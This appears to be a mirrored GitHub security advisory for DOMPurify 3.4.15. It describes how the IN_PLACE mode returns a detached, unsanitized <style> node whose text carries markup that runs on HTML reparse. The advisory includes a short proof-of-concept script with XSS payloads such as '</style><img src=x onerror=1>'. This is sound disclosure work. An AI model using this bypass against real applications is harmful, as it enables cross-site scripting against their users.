GHSA-6688-9rhm-gjv2
## Environment - dompurify 3.4.15 (current npm release); reproduced independently on jsdom 30.0.1 and 29.1.1 (Node.js 20.x / 26.x) - Config: `DOMPurify.sanitize(node, { IN_PLACE: true })` on a Node input; `SAFE_FOR_XML` at its default (`true`) ## Summary The 3.4.9 fix for the IN_PLACE detached-root class added two protections on the IN_PLACE return path: a fail-closed `TypeError` in `_forceRemove` when a node selected for removal cannot be detached, and a `_neutralizeSubtree` pass (`dist/purify.js` line 1336) that strips non-allowlisted **attributes** from removed subtrees. Both miss the rawtext **text-content** form. When the force-removed root is a rawtext element (`<style>`), the payload lives in the node's *text*: the node detaches fine (the `TypeError` guard is not reached), `_neutralizeSubtree` strips nothing (there are no attributes), and the IN_PLACE exit returns the detached, never-sanitized `<style>` whose text still carries live markup. Serializing that node and re-parsing it in **plain HTML context** materializes the payload — no foreign-content context required. The same Node input sanitized **without** `IN_PLACE` returns an empty result: the only difference is the IN_PLACE return path handing the killed node back. ## Steps to reproduce ```js const { JSDOM } = require('jsdom'); const createDOMPurify = require('dompurify'); // 3.4.15 const window = new JSDOM('').window; const DOMPurify = createDOMPurify(window); const styleRoot = window.document.createElement('style'); styleRoot.setAttribute('onclick', 'alert(1)'); // attribute payload styleRoot.textContent = '</style><img src=x onerror=1>'; // text payload window.document.body.appendChild(styleRoot); const returned = DOMPurify.sanitize(styleRoot, { IN_PLACE: true }); console.log(returned === styleRoot); // true (same node) console.log(styleRoot.parentNode === null); // true (detached) console.log(styleRoot.outerHTML); // <style></style><img src=x one
Properties
- ghsa_id
- GHSA-6688-9rhm-gjv2
- summary
- DOMPurify: IN_PLACE returns a force-removed rawtext root whose text carries attacker markup — pure HTML reparse executes
- severity
- low
- last_source
- GitHub Advisory Database
- cve_id
- GHSA-6688-9rhm-gjv2
- signal_observed_at
- 2026-10-06T02:58:31+00:00
- is_ghsa_only
- true
- retrieved_at
- 2026-10-06T03:05:59+00:00
- ghsa_published
- 2026-10-05T23:43:53Z
- source_url
- https://github.com/advisories/GHSA-6688-9rhm-gjv2
- ghsa_updated
- 2026-10-05T23:43:54Z
Related Entities (4)
REPORTED_BY (1)
VULNERABLE_TO (1)
AFFECTS (1)
HAS_WEAKNESS (1)
Explore deeper with Ninja Signal's threat intelligence graph